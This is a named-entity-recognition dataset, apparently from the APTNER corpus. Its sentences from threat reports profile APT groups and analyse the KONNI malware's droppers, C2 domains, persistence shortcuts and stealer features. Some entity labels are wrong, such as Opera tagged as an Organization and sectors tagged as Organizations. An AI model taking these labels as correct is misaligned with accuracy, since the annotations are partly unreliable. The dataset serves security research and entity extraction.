{"text": "Axiom : Group72 .", "spans": {"Organization: Axiom": [[0, 5]], "Organization: Group72": [[8, 15]]}, "info": {"id": "aptner_train_002887", "source": "aptner_train"}} {"text": "Axiom is a cyber espionage group suspected to be associated with the Chinese government .", "spans": {"Organization: Axiom": [[0, 5]]}, "info": {"id": "aptner_train_002888", "source": "aptner_train"}} {"text": "It is responsible for the Operation SMN campaign .", "spans": {}, "info": {"id": "aptner_train_002889", "source": "aptner_train"}} {"text": "Though both this group and O Winnti Group use the malware O Winnti , the two groups appear to be distinct based on differences in reporting on the groups' TTPs and targeting .", "spans": {"Organization: Winnti": [[29, 35], [60, 66]]}, "info": {"id": "aptner_train_002890", "source": "aptner_train"}} {"text": "Suckfly is a China based threat group that 
has been active since at least 2014 .", "spans": {"Organization: Suckfly": [[0, 7]]}, "info": {"id": "aptner_train_002891", "source": "aptner_train"}} {"text": "TA459 is a threat group believed to operate out of China that has targeted countries including Russia , Belarus , Mongolia , and others .", "spans": {"Organization: TA459": [[0, 5]]}, "info": {"id": "aptner_train_002892", "source": "aptner_train"}} {"text": "TA505 is a financially motivated threat group that has been active since at least 2014 .", "spans": {"Organization: TA505": [[0, 5]]}, "info": {"id": "aptner_train_002893", "source": "aptner_train"}} {"text": "The group is known for frequently changing malware and driving global trends in criminal malware distribution .", "spans": {}, "info": {"id": "aptner_train_002894", "source": "aptner_train"}} {"text": "Magic Hound : Rocket Kitten , Operation Saffron Rose , Ajax Security Team , Operation Woolen-Goldfish , Newscaster , Cobalt Gypsy , APT35 .", "spans": {"Organization: Magic Hound": [[0, 11]], "Organization: Rocket Kitten": [[14, 27]], "Organization: Operation Saffron Rose": [[30, 52]], "Organization: Ajax Security Team": [[55, 73]], "Organization: Operation Woolen-Goldfish": [[76, 101]], "Organization: Newscaster": [[104, 114]], "Organization: Cobalt Gypsy": [[117, 129]], "Organization: APT35": [[132, 137]]}, "info": {"id": "aptner_train_002895", "source": "aptner_train"}} {"text": "Magic Hound is an Iranian-sponsored threat group operating primarily in the Middle East that dates back as early as 2014 .", "spans": {"Organization: Magic Hound": [[0, 11]]}, "info": {"id": "aptner_train_002896", "source": "aptner_train"}} {"text": "The group behind the campaign has primarily targeted organizations in the energy , government , and technology sectors that are either based or have business interests in Saudi Arabia . menuPass : Stone Panda , APT10 , Red Apollo , CVNX , HOGFISH . 
menuPass is a threat group that appears to originate from China and has been active since approximately 2009 .", "spans": {"Organization: menuPass": [[186, 194], [249, 257]], "Organization: Stone Panda": [[197, 208]], "Organization: APT10": [[211, 216]], "Organization: Red Apollo": [[219, 229]], "Organization: CVNX": [[232, 236]], "Organization: HOGFISH": [[239, 246]]}, "info": {"id": "aptner_train_002897", "source": "aptner_train"}} {"text": "The group has targeted healthcare , defense , aerospace , and government sectors , and has targeted Japanese victims since at least 2014 .", "spans": {}, "info": {"id": "aptner_train_002898", "source": "aptner_train"}} {"text": "In 2016 and 2017 , the group targeted managed IT service providers , manufacturing and mining companies , and a university .", "spans": {}, "info": {"id": "aptner_train_002899", "source": "aptner_train"}} {"text": "Moafee is a threat group that appears to operate from the Guandong Province of China .", "spans": {"Organization: Moafee": [[0, 6]]}, "info": {"id": "aptner_train_002900", "source": "aptner_train"}} {"text": "Due to overlapping TTPs , including similar custom tools , Moafee is thought to have a direct or indirect relationship with the threat group DragonOK .", "spans": {"Organization: Moafee": [[59, 65]], "Organization: group DragonOK": [[135, 149]]}, "info": {"id": "aptner_train_002901", "source": "aptner_train"}} {"text": "SilverTerrier is a Nigerian threat group that has been seen active since 2014 .", "spans": {"Organization: SilverTerrier": [[0, 13]]}, "info": {"id": "aptner_train_002902", "source": "aptner_train"}} {"text": "SilverTerrier mainly targets organizations in high technology , higher education , and manufacturing .", "spans": {"Organization: SilverTerrier": [[0, 13]]}, "info": {"id": "aptner_train_002903", "source": "aptner_train"}} {"text": "Operation Soft Cell is a group that is reportedly affiliated with China and is likely state-sponsored .", "spans": {"Organization: 
Soft Cell": [[10, 19]]}, "info": {"id": "aptner_train_002904", "source": "aptner_train"}} {"text": "The group has operated since at least 2012 and has compromised high-profile telecommunications networks .", "spans": {"Organization: high-profile telecommunications networks": [[63, 103]]}, "info": {"id": "aptner_train_002905", "source": "aptner_train"}} {"text": "Sowbug is a threat group that has conducted targeted attacks against organizations in South America and Southeast Asia , particularly government entities , since at least 2015 .", "spans": {"Organization: Sowbug": [[0, 6]], "Organization: government entities": [[134, 153]]}, "info": {"id": "aptner_train_002906", "source": "aptner_train"}} {"text": "Tropic Trooper is an unaffiliated threat group that has led targeted campaigns against targets in Taiwan , the Philippines , and Hong Kong .", "spans": {"Organization: Tropic Trooper": [[0, 14]]}, "info": {"id": "aptner_train_002907", "source": "aptner_train"}} {"text": "Tropic Trooper focuses on targeting government , healthcare , transportation , and high-tech industries and has been active since 2011 .", "spans": {"Organization: Tropic Trooper": [[0, 14]], "Organization: government": [[36, 46]]}, "info": {"id": "aptner_train_002908", "source": "aptner_train"}} {"text": "Turla : Waterbug , WhiteBear , VENOMOUS BEAR , Snake , Krypton .", "spans": {"Organization: Turla": [[0, 5]], "Organization: Waterbug": [[8, 16]], "Organization: WhiteBear": [[19, 28]], "Organization: VENOMOUS BEAR": [[31, 44]], "Organization: Snake": [[47, 52]], "Organization: Krypton": [[55, 62]]}, "info": {"id": "aptner_train_002909", "source": "aptner_train"}} {"text": "Turla is a Russian-based threat group that has infected victims in over 45 countries , spanning a range of industries including government , embassies , military , education , research and pharmaceutical companies since 2004 .", "spans": {"Organization: Turla": [[0, 5]], "Organization: government": [[128, 138]], 
"Organization: embassies": [[141, 150]], "Organization: military": [[153, 161]], "Organization: pharmaceutical companies": [[189, 213]]}, "info": {"id": "aptner_train_002910", "source": "aptner_train"}} {"text": "Heightened activity was seen in mid-2015 .", "spans": {}, "info": {"id": "aptner_train_002911", "source": "aptner_train"}} {"text": "Turla is known for conducting watering hole and spearphishing campaigns and leveraging in-house tools and malware .", "spans": {"Organization: Turla": [[0, 5]], "System: leveraging in-house tools": [[76, 101]], "Malware: malware": [[106, 113]]}, "info": {"id": "aptner_train_002912", "source": "aptner_train"}} {"text": "Turla ’s espionage platform is mainly used against Windows machines , but has also been seen used against macOS and Linux machines .", "spans": {"Organization: Turla": [[0, 5]], "System: Windows": [[51, 58]], "System: macOS": [[106, 111]], "System: Linux": [[116, 121]]}, "info": {"id": "aptner_train_002913", "source": "aptner_train"}} {"text": "Winnti Group : Blackfly .", "spans": {"Organization: Winnti Group": [[0, 12]], "Organization: Blackfly": [[15, 23]]}, "info": {"id": "aptner_train_002914", "source": "aptner_train"}} {"text": "Winnti Group is a threat group with Chinese origins that has been active since at least 2010 .", "spans": {"Organization: Winnti Group": [[0, 12]]}, "info": {"id": "aptner_train_002915", "source": "aptner_train"}} {"text": "The group has heavily targeted the gaming industry , but it has also expanded the scope of its targeting .", "spans": {}, "info": {"id": "aptner_train_002916", "source": "aptner_train"}} {"text": "Some reporting suggests a number of other groups , including Axiom , APT17 , and Ke3chang , are closely linked to Winnti Group .", "spans": {"Organization: Axiom": [[61, 66]], "Organization: APT17": [[69, 74]], "Organization: Ke3chang": [[81, 89]], "Organization: Winnti Group": [[114, 126]]}, "info": {"id": "aptner_train_002917", "source": "aptner_train"}} {"text": 
"Stealth Falcon is a threat group that has conducted targeted spyware attacks against Emirati journalists , activists , and dissidents since at least 2012 .", "spans": {"Organization: Stealth Falcon": [[0, 14]]}, "info": {"id": "aptner_train_002918", "source": "aptner_train"}} {"text": "Circumstantial evidence suggests there could be a link between this group and the United Arab Emirates ( UAE ) government , but that has not been confirmed .", "spans": {"Organization: United Arab Emirates ( UAE ) government": [[82, 121]]}, "info": {"id": "aptner_train_002919", "source": "aptner_train"}} {"text": "The group appears to have targeted academic institutions , but its motives remain unclear .", "spans": {}, "info": {"id": "aptner_train_002921", "source": "aptner_train"}} {"text": "Strider : ProjectSauron . Strider is a threat group that has been active since at least 2011 and has targeted victims in Russia , China , Sweden , Belgium , Iran , and Rwanda .", "spans": {"Organization: Strider": [[0, 7], [26, 33]], "Organization: ProjectSauron ": [[10, 24]]}, "info": {"id": "aptner_train_002922", "source": "aptner_train"}} {"text": "Putter Panda : APT2 , MSUpdater .", "spans": {"Organization: Putter Panda": [[0, 12]], "Organization: APT2": [[15, 19]], "Organization: MSUpdater": [[22, 31]]}, "info": {"id": "aptner_train_002923", "source": "aptner_train"}} {"text": "Rancor is a threat group that has led targeted campaigns against the South East Asia region .", "spans": {"Organization: Rancor": [[0, 6]]}, "info": {"id": "aptner_train_002925", "source": "aptner_train"}} {"text": "Rancor uses politically-motivated lures to entice victims to open malicious documents .", "spans": {"Organization: Rancor": [[0, 6]], "System: politically-motivated lures": [[12, 39]]}, "info": {"id": "aptner_train_002926", "source": "aptner_train"}} {"text": "The group uses a Trojan by the same name ( RTM ) .", "spans": {"Malware: Trojan": [[17, 23]], "Organization: RTM": [[43, 46]]}, "info": {"id": 
"aptner_train_002928", "source": "aptner_train"}} {"text": "FIN4 is a financially motivated threat group that has targeted confidential information related to the public financial market , particularly regarding healthcare and pharmaceutical companies , since at least 2013 .", "spans": {"Organization: FIN4": [[0, 4]]}, "info": {"id": "aptner_train_002929", "source": "aptner_train"}} {"text": "FIN4 is unique in that they do not infect victims with typical persistent malware , but rather they focus on capturing credentials authorized to access email and other non-public correspondence .", "spans": {"Organization: FIN4": [[0, 4]], "System: email": [[152, 157]]}, "info": {"id": "aptner_train_002930", "source": "aptner_train"}} {"text": "FIN5 is a financially motivated threat group that has targeted personally identifiable information and payment card information .", "spans": {"Organization: FIN5": [[0, 4]]}, "info": {"id": "aptner_train_002931", "source": "aptner_train"}} {"text": "The group has been active since at least 2008 and has targeted the restaurant , gaming , and hotel industries .", "spans": {}, "info": {"id": "aptner_train_002932", "source": "aptner_train"}} {"text": "The group is made up of actors who likely speak Russian .", "spans": {}, "info": {"id": "aptner_train_002933", "source": "aptner_train"}} {"text": "FIN6 : ITG08 .", "spans": {"Organization: FIN6": [[0, 4]], "Organization: ITG08": [[7, 12]]}, "info": {"id": "aptner_train_002934", "source": "aptner_train"}} {"text": "FIN6 is a cyber crime group that has stolen payment card data and sold it for profit on underground marketplaces .", "spans": {"Organization: FIN6": [[0, 4]]}, "info": {"id": "aptner_train_002935", "source": "aptner_train"}} {"text": "This group has aggressively targeted and compromised point of sale ( PoS ) systems in the hospitality and retail sectors .", "spans": {}, "info": {"id": "aptner_train_002936", "source": "aptner_train"}} {"text": "Leviathan : TEMP.Jumper , APT40 , 
TEMP.Periscope .", "spans": {"Organization: Leviathan": [[0, 9]], "Organization: TEMP.Jumper": [[12, 23]], "Organization: APT40": [[26, 31]], "Organization: TEMP.Periscope": [[34, 48]]}, "info": {"id": "aptner_train_002937", "source": "aptner_train"}} {"text": "Leviathan is a cyber espionage group that has been active since at least 2013 .", "spans": {"Organization: Leviathan": [[0, 9]]}, "info": {"id": "aptner_train_002938", "source": "aptner_train"}} {"text": "The group generally targets defense and government organizations , but has also targeted a range of industries including engineering firms , shipping and transportation , manufacturing , defense , government offices , and research universities in the United States , Western Europe , and along the South China Sea .", "spans": {}, "info": {"id": "aptner_train_002939", "source": "aptner_train"}} {"text": "Lotus Blossom : DRAGONFISH , Spring Dragon .", "spans": {"Organization: Lotus Blossom": [[0, 13]], "Organization: DRAGONFISH": [[16, 26]], "Organization: Spring Dragon": [[29, 42]]}, "info": {"id": "aptner_train_002940", "source": "aptner_train"}} {"text": "Machete : El Machete .", "spans": {"Organization: Machete": [[0, 7]], "Organization: El Machete": [[10, 20]]}, "info": {"id": "aptner_train_002942", "source": "aptner_train"}} {"text": "Machete is a group that has been active since at least 2010 , targeting high-profile government entities in Latin American countries .", "spans": {"Organization: Machete": [[0, 7]]}, "info": {"id": "aptner_train_002943", "source": "aptner_train"}} {"text": "admin@338 is a China based cyber threat group .", "spans": {"Organization: admin@338": [[0, 9]]}, "info": {"id": "aptner_train_002944", "source": "aptner_train"}} {"text": "It has previously used newsworthy events as lures to deliver malware and has primarily targeted organizations involved in financial , economic , and trade policy , typically using publicly available RATs such as PoisonIvy , as well as some non-public 
backdoors .", "spans": {"Malware: RATs": [[199, 203]], "Malware: PoisonIvy": [[212, 221]], "Malware: non-public backdoors": [[240, 260]]}, "info": {"id": "aptner_train_002945", "source": "aptner_train"}} {"text": "APT1 : Comment Crew , Comment Group , Comment Panda .", "spans": {"Organization: APT1": [[0, 4]], "Organization: Comment Crew": [[7, 19]], "Organization: Comment Group": [[22, 35]], "Organization: Comment Panda": [[38, 51]]}, "info": {"id": "aptner_train_002946", "source": "aptner_train"}} {"text": "APT12 : IXESHE , DynCalc , Numbered Panda , DNSCALC .", "spans": {"Organization: APT12": [[0, 5]], "Organization: IXESHE": [[8, 14]], "Organization: DynCalc": [[17, 24]], "Organization: Numbered Panda": [[27, 41]], "Organization: DNSCALC": [[44, 51]]}, "info": {"id": "aptner_train_002948", "source": "aptner_train"}} {"text": "APT12 is a threat group that has been attributed to China .", "spans": {"Organization: APT12": [[0, 5]]}, "info": {"id": "aptner_train_002949", "source": "aptner_train"}} {"text": "The group has targeted a variety of victims including but not limited to media outlets , high-tech companies , and multiple governments .", "spans": {"Organization: media outlets": [[73, 86]], "Organization: high-tech companies": [[89, 108]], "Organization: multiple governments": [[115, 135]]}, "info": {"id": "aptner_train_002950", "source": "aptner_train"}} {"text": "FANCY BEAR ( also known as Sofacy or APT28 ) is a separate Russian-based threat actor , which has been active since mid 2000s , and has been responsible for targeted intrusion campaigns against the Aerospace , Defense , Energy , Government and Media sectors .", "spans": {"Organization: FANCY BEAR": [[0, 10]], "Organization: Sofacy": [[27, 33]], "Organization: APT28": [[37, 42]], "Organization: Aerospace": [[198, 207]], "Organization: Defense": [[210, 217]], "Organization: Energy": [[220, 226]], "Organization: Government": [[229, 239]], "Organization: Media sectors": [[244, 257]]}, "info": {"id": 
"aptner_train_003024", "source": "aptner_train"}} {"text": "However , three themes in APT28 's targeting clearly reflects LOCs of specific interest to an Eastern European government , most likely the Russian government .", "spans": {"Organization: APT28": [[26, 31]], "Organization: government": [[111, 121]], "Organization: Russian government": [[140, 158]]}, "info": {"id": "aptner_train_003026", "source": "aptner_train"}} {"text": "Our visibility into the operations of APT28 - a group we believe the Russian government sponsors - has given us insight into some of the government 's targets , as well as its objectives and the activities designed to further them .", "spans": {"Organization: APT28": [[38, 43]], "Organization: Russian government": [[69, 87]], "Organization: government": [[137, 147]]}, "info": {"id": "aptner_train_003040", "source": "aptner_train"}} {"text": "APT28 is using novel techniques involving the EternalBlue exploits and the open source tool Responder to spread laterally through networks and likely target travelers .", "spans": {"Organization: APT28": [[0, 5]], "Vulnerability: EternalBlue": [[46, 57]], "Vulnerability: exploits": [[58, 66]], "Malware: open source tool": [[75, 91]], "Malware: Responder": [[92, 101]]}, "info": {"id": "aptner_train_003070", "source": "aptner_train"}} {"text": "The Sofacy threat group continues to target government organizations in the EU , US , and former Soviet states to deliver the Zebrocy tool as a payload .", "spans": {"Organization: Sofacy threat group": [[4, 23]], "Organization: government organizations": [[44, 68]], "Malware: Zebrocy tool": [[126, 138]]}, "info": {"id": "aptner_train_003079", "source": "aptner_train"}} {"text": "Importantly , PinchDuke trojan samples alACTs contain a notable text string , which we believe is used as a campaign identifier by the Dukes group to distinguish between multiple attack campaigns that are run in parallel .", "spans": {"Malware: PinchDuke trojan samples": [[14, 38]], 
"Organization: Dukes group": [[135, 146]]}, "info": {"id": "aptner_train_003090", "source": "aptner_train"}} {"text": "Secondly , the value the Dukes intended to gain from these MiniDuke campaigns may have been so great that they deemed it worth the risk of getting noticed .", "spans": {"Organization: Dukes": [[25, 30]]}, "info": {"id": "aptner_train_003094", "source": "aptner_train"}} {"text": "This assertion of time zone is also supported by timestamps found in many GeminiDuke samples , which similarly suggest the group work in the Moscow Standard TIME timezone , as further detailed in the section on the technical analysis of GeminiDuke .", "spans": {"Malware: GeminiDuke samples": [[74, 92]], "Malware: GeminiDuke": [[237, 247]]}, "info": {"id": "aptner_train_003104", "source": "aptner_train"}} {"text": "APT38 .", "spans": {"Organization: APT38": [[0, 5]]}, "info": {"id": "aptner_train_003239", "source": "aptner_train"}} {"text": "From March 18 to 26 we observed the malware operating in multiple LOCs of the world .", "spans": {}, "info": {"id": "aptner_train_003547", "source": "aptner_train"}} {"text": "KONNI : A Malware Under The Radar For Years .", "spans": {"Malware: KONNI": [[0, 5]], "System: Radar": [[28, 33]]}, "info": {"id": "aptner_train_003556", "source": "aptner_train"}} {"text": "During this time it has managed to avoid scrutiny by the security community .", "spans": {}, "info": {"id": "aptner_train_003558", "source": "aptner_train"}} {"text": "The current version of the malware allows the operator to steal files , keystrokes , perform screenshots , and execute arbitrary code on the infected host .", "spans": {}, "info": {"id": "aptner_train_003559", "source": "aptner_train"}} {"text": "Talos has named this malware KONNI .", "spans": {"Organization: Talos": [[0, 5]], "Malware: KONNI": [[29, 34]]}, "info": {"id": "aptner_train_003560", "source": "aptner_train"}} {"text": "Throughout the multiple campaigns observed over the last 3 years , the actor has 
used an email attachment as the initial infection vector .", "spans": {}, "info": {"id": "aptner_train_003561", "source": "aptner_train"}} {"text": "They then use additional social engineering to prompt the target to open a .scr file , display a decoy document to the users , and finally execute the malware on the victim's machine .", "spans": {"Indicator: .scr": [[75, 79]]}, "info": {"id": "aptner_train_003562", "source": "aptner_train"}} {"text": "The malware infrastructure of the analysed samples was hosted by a free web hosting provider: 000webhost .", "spans": {}, "info": {"id": "aptner_train_003563", "source": "aptner_train"}} {"text": "The malware has evolved over time .", "spans": {}, "info": {"id": "aptner_train_003564", "source": "aptner_train"}} {"text": "In this article , we will analyse this evolution: at the beginning the malware was only an information stealer without remote administration , it moved from a single file malware to a dual file malware (an executable and a dynamic library ) , the malware has supported more and more features over the time , the decoy documents have become more and more advanced .", "spans": {"System: dynamic library": [[223, 238]]}, "info": {"id": "aptner_train_003565", "source": "aptner_train"}} {"text": "The different versions contain copy/pasted code from previous versions .", "spans": {}, "info": {"id": "aptner_train_003566", "source": "aptner_train"}} {"text": "Moreover the new version searches for files generated by previous versions .", "spans": {}, "info": {"id": "aptner_train_003567", "source": "aptner_train"}} {"text": "This evolution is illustrated across 4 campaigns : one in 2014 , one in 2016 and finally two in 2017 .", "spans": {}, "info": {"id": "aptner_train_003568", "source": "aptner_train"}} {"text": "The decoy document of the 2 last campaigns suggests that the targets are public organisations .", "spans": {}, "info": {"id": "aptner_train_003569", "source": "aptner_train"}} {"text": "Both documents 
contained email addresses , phone numbers and contacts of members of official organizations such as United Nations , UNICEF , and Embassies linked to North Korea .", "spans": {"System: email": [[25, 30]], "Organization: official organizations": [[84, 106]], "Organization: United Nations": [[115, 129]], "Organization: UNICEF": [[132, 138]], "Organization: Embassies": [[145, 154]]}, "info": {"id": "aptner_train_003570", "source": "aptner_train"}} {"text": "In this campaign , the dropper filename was beauty.scr .", "spans": {"Indicator: beauty.scr": [[44, 54]]}, "info": {"id": "aptner_train_003571", "source": "aptner_train"}} {"text": "Based on the compilation date of the two binaries , this campaign took place in September 2014 .", "spans": {}, "info": {"id": "aptner_train_003572", "source": "aptner_train"}} {"text": "Once executed , two files were dropped on the targeted system : a decoy document (a picture) and a fake svchost.exe binary .", "spans": {"Indicator: svchost.exe": [[104, 115]]}, "info": {"id": "aptner_train_003573", "source": "aptner_train"}} {"text": "Both files were stored in \"C:\\Windows\" .", "spans": {"Indicator: \"C:\\Windows\"": [[26, 38]]}, "info": {"id": "aptner_train_003574", "source": "aptner_train"}} {"text": "The fake svchost binary is the KONNI malware .", "spans": {"Malware: KONNI": [[31, 36]]}, "info": {"id": "aptner_train_003575", "source": "aptner_train"}} {"text": "The first task of the malware is to generate an ID to identify the infected system .", "spans": {}, "info": {"id": "aptner_train_003576", "source": "aptner_train"}} {"text": "This ID is generated based on the installation date of the system .", "spans": {}, "info": {"id": "aptner_train_003577", "source": "aptner_train"}} {"text": "The second task of malware is to ping the CC and get orders .", "spans": {}, "info": {"id": "aptner_train_003578", "source": "aptner_train"}} {"text": "The malware includes 2 domains: phpschboy.prohosts.org , jams481.site.bz .", "spans": 
{"Indicator: phpschboy.prohosts.org": [[32, 54]], "Indicator: jams481.site.bz": [[57, 72]]}, "info": {"id": "aptner_train_003579", "source": "aptner_train"}} {"text": "The developer used the Microsoft Winsocks API to handle the network connection .", "spans": {"System: Microsoft Winsocks API": [[23, 45]]}, "info": {"id": "aptner_train_003580", "source": "aptner_train"}} {"text": "Surprisingly , this isn't the easiest or the most efficient technical choice for HTTP connection .", "spans": {}, "info": {"id": "aptner_train_003581", "source": "aptner_train"}} {"text": "The malware samples we analysed connected to only one URI: /login.php .", "spans": {"Indicator: /login.php": [[59, 80]]}, "info": {"id": "aptner_train_003582", "source": "aptner_train"}} {"text": "This version of KONNI is not designed to execute code on the infected system .", "spans": {"Malware: KONNI": [[16, 21]]}, "info": {"id": "aptner_train_003583", "source": "aptner_train"}} {"text": "The purpose is to be executed only once and steal data on the infected system , here are the main features : Keyloggers , Clipboard stealer , Firefox profiles and cookies stealer , Chrome profiles and cookies stealer , Opera profiles and cookies stealer .", "spans": {"System: Firefox": [[142, 149]], "System: Chrome": [[181, 187]], "Organization: Opera": [[219, 224]]}, "info": {"id": "aptner_train_003584", "source": "aptner_train"}} {"text": "The name of the .scr file was directly linked to tension between North Korea and USA in March 2016 more information .", "spans": {"Indicator: .scr": [[16, 20]]}, "info": {"id": "aptner_train_003585", "source": "aptner_train"}} {"text": "Based on the compilation dates of the binaries , the campaign took place in the same period .", "spans": {}, "info": {"id": "aptner_train_003586", "source": "aptner_train"}} {"text": "An interesting fact : the dropped library was compiled in 2014 and appears in our telemetry in August 2015 .", "spans": {}, "info": {"id": "aptner_train_003587", 
"source": "aptner_train"}} {"text": "Indicating that this library was probably used in another campaign .", "spans": {}, "info": {"id": "aptner_train_003588", "source": "aptner_train"}} {"text": "The .scr file contains 2 Office documents .", "spans": {"Indicator: .scr": [[4, 8]], "System: Office": [[25, 31]]}, "info": {"id": "aptner_train_003589", "source": "aptner_train"}} {"text": "The first document was in English and a second in Russian .", "spans": {}, "info": {"id": "aptner_train_003590", "source": "aptner_train"}} {"text": "In the sample only the English version can be displayed to the user (that is hardcoded in the sample) .", "spans": {}, "info": {"id": "aptner_train_003591", "source": "aptner_train"}} {"text": "The Russian document is not used by the sample , we assume that the author of the malware forgot to remove the resource containing the Russia decoy document .", "spans": {}, "info": {"id": "aptner_train_003592", "source": "aptner_train"}} {"text": "The malware author changed the malware architecture , this version is divided in two binaries: conhote.dll , winnit.exe .", "spans": {"Indicator: conhote.dll": [[95, 106]], "Indicator: winnit.exe": [[109, 119]]}, "info": {"id": "aptner_train_003593", "source": "aptner_train"}} {"text": "Another difference is the directory where the files are dropped , it's no longer C:\\Windows but rather the local setting of the current user (%USERPROFILE%\\Local Settings\\winnit\\winnit.exe) .", "spans": {"Indicator: C:\\Windows": [[81, 91]], "Indicator: (%USERPROFILE%\\Local Settings\\winnit\\winnit.exe)": [[141, 189]]}, "info": {"id": "aptner_train_003594", "source": "aptner_train"}} {"text": "Thanks to this modification , the malware can be executed with a non-administrator account .", "spans": {}, "info": {"id": "aptner_train_003595", "source": "aptner_train"}} {"text": "The .dll file is executed by the .exe file .", "spans": {"Indicator: .dll": [[4, 8]], "Indicator: .exe": [[33, 37]]}, "info": {"id": 
"aptner_train_003596", "source": "aptner_train"}} {"text": "In this version , a shortcut is created in order to launch winnit.exe in the following path %USERPROFILE%\\Start Menu\\Programs\\Startup\\Anti virus service.lnk .", "spans": {"Indicator: winnit.exe": [[59, 69]], "Indicator: %USERPROFILE%\\Start Menu\\Programs\\Startup\\Anti virus service.lnk": [[92, 156]]}, "info": {"id": "aptner_train_003597", "source": "aptner_train"}} {"text": "As you can see the attacker has went to great lengths to disguise his service as a legitimate Antivirus Service by using the name 'Anti virus service.lnk' .", "spans": {"System: Antivirus Service": [[94, 111]], "Indicator: 'Anti virus service.lnk'": [[130, 154]]}, "info": {"id": "aptner_train_003598", "source": "aptner_train"}} {"text": "This is of course simple but often it can be enough for a user to miss something malicious by name .", "spans": {}, "info": {"id": "aptner_train_003599", "source": "aptner_train"}} {"text": "As in the previous version , the ID of the infected system is generated with exactly the same method .", "spans": {}, "info": {"id": "aptner_train_003600", "source": "aptner_train"}} {"text": "The C2 is different and the analysed version this time only contains a single domain: dowhelsitjs.netau.net .", "spans": {"System: C2": [[4, 6]], "Indicator: dowhelsitjs.netau.net": [[86, 107]]}, "info": {"id": "aptner_train_003601", "source": "aptner_train"}} {"text": "In this version , the developer used a different API , the Wininet API which make more sense for Web requests .", "spans": {"System: Wininet API": [[59, 70]]}, "info": {"id": "aptner_train_003602", "source": "aptner_train"}} {"text": "Moreover the C2 infrastructure evolved too , more .php files are available through the web hosting: /login.php /upload.php /download.php .", "spans": {"System: C2": [[13, 15]], "Indicator: /login.php": [[100, 121]], "Indicator: /upload.php": [[122, 144]], "Indicator: /download.php": [[145, 169]]}, "info": {"id": 
"aptner_train_003603", "source": "aptner_train"}} {"text": "This version includes the stealer features mentioned in the previous version and additionally Remote Administration Tool features such as file uploading/download and arbitrary command execution .", "spans": {"System: Remote Administration Tool": [[94, 120]]}, "info": {"id": "aptner_train_003604", "source": "aptner_train"}} {"text": "The library is only used to perform keylogging and clipboard stealing .", "spans": {}, "info": {"id": "aptner_train_003605", "source": "aptner_train"}} {"text": "Indeed , the malware author moved this part of the code from the core of the malware to a library .", "spans": {}, "info": {"id": "aptner_train_003606", "source": "aptner_train"}} {"text": "An interesting element is that the malware looks for filenames created with the previous version of KONNI .", "spans": {"Malware: KONNI": [[100, 105]]}, "info": {"id": "aptner_train_003607", "source": "aptner_train"}} {"text": "This implies that the malware targeted the same people as the previous version and they are designed to work together .", "spans": {}, "info": {"id": "aptner_train_003608", "source": "aptner_train"}} {"text": "The malware internally uses the following files : solhelp.ocx sultry.ocx helpsol.ocx psltre.ocx screentmp.tmp (log file of the keylogger) spadmgr.ocx apsmgrd.ocx wpg.db .", "spans": {"Indicator: solhelp.ocx": [[50, 61]], "Indicator: sultry.ocx": [[62, 72]], "Indicator: helpsol.ocx": [[73, 84]], "Indicator: psltre.ocx": [[85, 95]], "Indicator: screentmp.tmp": [[96, 109]], "Indicator: spadmgr.ocx": [[138, 149]], "Indicator: apsmgrd.ocx": [[150, 161]], "Indicator: wpg.db": [[162, 168]]}, "info": {"id": "aptner_train_003609", "source": "aptner_train"}} {"text": "In this campaign , the malware author uses the following name: Pyongyang Directory Group email April 2017 RC_Office_Coordination_Associate.scr. 
The decoy document shown after infection is an Office document containing email addresses , phone numbers and contacts of members of official organizations such as the United Nations , UNICEF , Embassies linked to North Korea .", "spans": {"Indicator: RC_Office_Coordination_Associate.scr.": [[106, 143]], "System: Office": [[191, 197]], "System: email": [[218, 223]], "Organization: official organizations": [[277, 299]], "Organization: United Nations": [[312, 326]], "Organization: UNICEF": [[329, 335]], "Organization: Embassies": [[338, 347]]}, "info": {"id": "aptner_train_003610", "source": "aptner_train"}} {"text": "The .scr files drops two files: an executable and a library .", "spans": {"Indicator: .scr": [[4, 8]]}, "info": {"id": "aptner_train_003611", "source": "aptner_train"}} {"text": "As in the previous version , the persistence is achieved by a Windows shortcut (in this case adobe distillist.lnk ) .", "spans": {"System: Windows": [[62, 69]], "Indicator: distillist.lnk": [[99, 113]]}, "info": {"id": "aptner_train_003612", "source": "aptner_train"}} {"text": "Contrary to the previous version , the developers moved the core of malware to the library .", "spans": {}, "info": {"id": "aptner_train_003613", "source": "aptner_train"}} {"text": "The executable performs the following tasks: If the system is a 64-bit version of Windows , it downloads and executes a specific 64-bit version of the malware thanks to a powershell script .", "spans": {"System: Windows": [[82, 89]], "System: powershell": [[171, 181]]}, "info": {"id": "aptner_train_003614", "source": "aptner_train"}} {"text": "Loading the dropped library .", "spans": {}, "info": {"id": "aptner_train_003615", "source": "aptner_train"}} {"text": "The library contains the same features as the previous version as well as new ones .", "spans": {}, "info": {"id": "aptner_train_003616", "source": "aptner_train"}} {"text": "This version of KONNI is the most advanced with better coding .", "spans": {"Malware: KONNI": 
[[16, 21]]}, "info": {"id": "aptner_train_003617", "source": "aptner_train"}} {"text": "The malware configuration contains one Command and Control: pactchfilepacks.net23.net .", "spans": {"Indicator: pactchfilepacks.net23.net": [[60, 85]]}, "info": {"id": "aptner_train_003618", "source": "aptner_train"}} {"text": "A new URI is available: /uploadtm.php .", "spans": {"Indicator: /uploadtm.php": [[24, 48]]}, "info": {"id": "aptner_train_003619", "source": "aptner_train"}} {"text": "This URI is used with a new feature implemented in this version: the malware is able to perform screenshot (thanks to the GDI API) and uploads it thank to this URL .", "spans": {}, "info": {"id": "aptner_train_003620", "source": "aptner_train"}} {"text": "The malware checks if a file used on a previous version of KONNI is available on the system .", "spans": {"Malware: KONNI": [[59, 64]]}, "info": {"id": "aptner_train_003621", "source": "aptner_train"}} {"text": "Here is the complete list of files internally used by the RAT: error.tmp (the log file of the keylogger) tedsul.ocx helpsol.ocx trepsl.ocx psltred.ocx solhelp.ocx sulted.ocx .", "spans": {"Indicator: error.tmp": [[63, 72]], "Indicator: tedsul.ocx": [[105, 115]], "Indicator: helpsol.ocx": [[116, 127]], "Indicator: trepsl.ocx": [[128, 138]], "Indicator: psltred.ocx": [[139, 150]], "Indicator: solhelp.ocx": [[151, 162]], "Indicator: sulted.ocx": [[163, 173]]}, "info": {"id": "aptner_train_003622", "source": "aptner_train"}} {"text": "The handling of instructions has improved too .", "spans": {}, "info": {"id": "aptner_train_003623", "source": "aptner_train"}} {"text": "Here are the 7 actions that the infected machine can be instructed to perform: Delete a specific file .", "spans": {}, "info": {"id": "aptner_train_003624", "source": "aptner_train"}} {"text": "Upload a specific file based on a filename .", "spans": 